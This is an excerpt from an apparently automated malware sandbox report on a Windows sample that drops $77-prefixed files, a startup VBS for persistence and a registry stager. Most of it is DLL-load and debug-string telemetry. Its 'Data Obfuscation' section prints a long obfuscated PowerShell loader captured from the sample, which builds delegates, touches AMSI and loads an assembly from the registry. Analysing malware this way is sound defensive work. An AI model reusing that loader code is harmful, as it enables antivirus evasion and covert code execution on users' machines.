                      Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe | Section loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe | Section loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe | Section loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe | Section loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe | Section loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe | Section loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe | Section loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe | Section loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe | Section loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe | Section loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe | Section loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe | Section loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe | Section loaded: pdh.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe | Section loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: amsi.dll
                      Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: profapi.dll
                      Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: loadperf.dll
                      Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\spoolsv.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: C:\Windows\System32\wbem\WMIADAP.exe | File written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: vm6XYZzWOd.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: vm6XYZzWOd.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
                      Source: vm6XYZzWOd.exe | Static file information: File size 4720128 > 1048576
                      Source: vm6XYZzWOd.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x47fc00
                      Source: vm6XYZzWOd.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000011.00000002.3566674758.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381194238.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000011.00000000.2381194238.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3566674758.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: +@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000011.00000002.3565608470.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381021025.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000011.00000000.2381194238.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3566674758.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000011.00000002.3566674758.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381194238.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: vm6XYZzWOd.exe, 00000000.00000002.2336961544.0000000007780000.00000004.08000000.00040000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006BAD000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2765221836.0000000004770000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003890000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000011.00000002.3566674758.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381194238.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: vm6XYZzWOd.exe, 00000000.00000002.2336961544.0000000007780000.00000004.08000000.00040000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006BAD000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2765221836.0000000004770000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003890000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorb source: svchost.exe, 00000011.00000002.3565608470.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381021025.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: vm6XYZzWOd.exe, 00000000.00000002.2314321944.000000000699F000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2336449142.0000000007630000.00000004.08000000.00040000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003728000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: vm6XYZzWOd.exe, 00000000.00000002.2314321944.000000000699F000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2336449142.0000000007630000.00000004.08000000.00040000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003728000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: ~1.PDB @ source: svchost.exe, 00000011.00000002.3566674758.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381194238.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000011.00000002.3565608470.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381021025.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer($MqmAuoaRJIuKTQ,$IWmJQjKZijMLKdIaBfm).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+'d'+''+'l'+''+'l'+'');$woXAbHxooZFxzUvIS=$orrkynlqKpbkhN.Invoke($Null
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+'dD'+'e'+''+[Char](108)+''+[Char](101)+'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue('$'+[Char](55)+'7s'+'t'+'a'+[Char]
                      Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UKPEWRGEIPej{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$diFffPduGehihq,[Parameter(Position=1)][Type]$PCksoXTjIn)$dnnozXtGtCr=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+'dD'+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+'m'+''+'o'+'r'+[Char](121)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'','C'+[Char](108)+''+'a'+'s'+'s'+''+','+'P'+'u'+''+[Char](98)+''+'l'+''+'i'+'c'+[Char](44)+'S'+'e'+'a'+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+'n'+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+'u'+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dnnozXtGtCr.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+'e'+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$diFffPduGehihq).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+'tim'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$dnnozXtGtCr.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+'e','P'+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+'t,'+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$PCksoXTjIn,$diFffPduGehihq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $dnnozXtGtCr.CreateType();}$lVayyyANUYcKS=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'st'+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+'c'+''+[Char](114)+'o'+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+[Char](87)+''+'i'+''+'n'+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+'
                      Source: Yara match File source: 21.2.$77Kaxhwswfup.exe.5e0cba8.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 21.2.$77Kaxhwswfup.exe.46d04d0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.vm6XYZzWOd.exe.3a3eeb4.2.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.vm6XYZzWOd.exe.7550000.18.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.vm6XYZzWOd.exe.6887968.13.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.vm6XYZzWOd.exe.68af988.15.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 21.2.$77Kaxhwswfup.exe.47704f0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.vm6XYZzWOd.exe.6887968.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.vm6XYZzWOd.exe.699f9c8.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.vm6XYZzWOd.exe.68af988.15.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.vm6XYZzWOd.exe.68ff9a8.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 21.2.$77Kaxhwswfup.exe.46804b0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.vm6XYZzWOd.exe.3a3eeb4.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000000.00000002.2335244662.0000000007550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000015.00000002.2765221836.0000000004770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000015.00000002.2746243713.0000000003728000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.2314321944.000000000699F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000015.00000002.2746243713.0000000003591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000015.00000002.2765221836.0000000004591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.2314321944.0000000006431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000015.00000002.2778996025.0000000005DC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: vm6XYZzWOd.exe PID: 6772, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: $77Kaxhwswfup.exe PID: 7056, type: MEMORYSTR
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FF848F1B05C push esp; retf 4_2_00007FF848F1B05D
                      Source: C:\Users\user\AppData\Local\Temp\$778e373e Code function: 6_2_00FE1CC1 push ecx; ret 6_2_00FE1CD4
                      Source: C:\Windows\System32\dllhost.exe Code function: 7_3_000001B094BBB09D push rcx; retf 003Fh 7_3_000001B094BBB09E
                      Source: C:\Windows\System32\winlogon.exe Code function: 8_3_000001E85896B09D push rcx; retf 003Fh 8_3_000001E85896B09E
                      Source: C:\Windows\System32\lsass.exe Code function: 9_3_00000140ADFDB09D push rcx; retf 003Fh 9_3_00000140ADFDB09E
                      Source: C:\Windows\System32\svchost.exe Code function: 10_3_00000195DD5AB09D push rcx; retf 003Fh 10_3_00000195DD5AB09E
                      Source: C:\Windows\System32\dwm.exe Code function: 11_3_000001160CA4B09D push rcx; retf 003Fh 11_3_000001160CA4B09E
                      Source: C:\Windows\System32\svchost.exe Code function: 12_3_00000257E108B09D push rcx; retf 003Fh 12_3_00000257E108B09E
                      Source: C:\Windows\System32\svchost.exe Code function: 13_3_000001F28C1EB09D push rcx; retf 003Fh 13_3_000001F28C1EB09E
                      Source: C:\Windows\System32\svchost.exe Code function: 14_3_000001CA97FEB09D push rcx; retf 003Fh 14_3_000001CA97FEB09E
                      Source: C:\Windows\System32\svchost.exe Code function: 15_3_000001D2652FB09D push rcx; retf 003Fh 15_3_000001D2652FB09E
                      Source: C:\Windows\System32\svchost.exe Code function: 16_3_00000254A27DB09D push rcx; retf 003Fh 16_3_00000254A27DB09E
                      Source: C:\Windows\System32\svchost.exe Code function: 17_3_0000024B87DBB09D push rcx; retf 003Fh 17_3_0000024B87DBB09E
                      Source: C:\Windows\System32\svchost.exe Code function: 18_3_00000205FB3DB09D push rcx; retf 003Fh 18_3_00000205FB3DB09E
                      Source: C:\Windows\System32\svchost.exe Code function: 19_3_000001A20568B09D push rcx; retf 003Fh 19_3_000001A20568B09E
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe File created: C:\Users\user\AppData\Local\Temp\$778e373e
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe File created: C:\Users\user\AppData\Local\Temp\$77eec42d
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe File created: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe File created: C:\Users\user\AppData\Local\Temp\$77a3a3b4

                      Boot Survival

                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4 Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $77stager
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
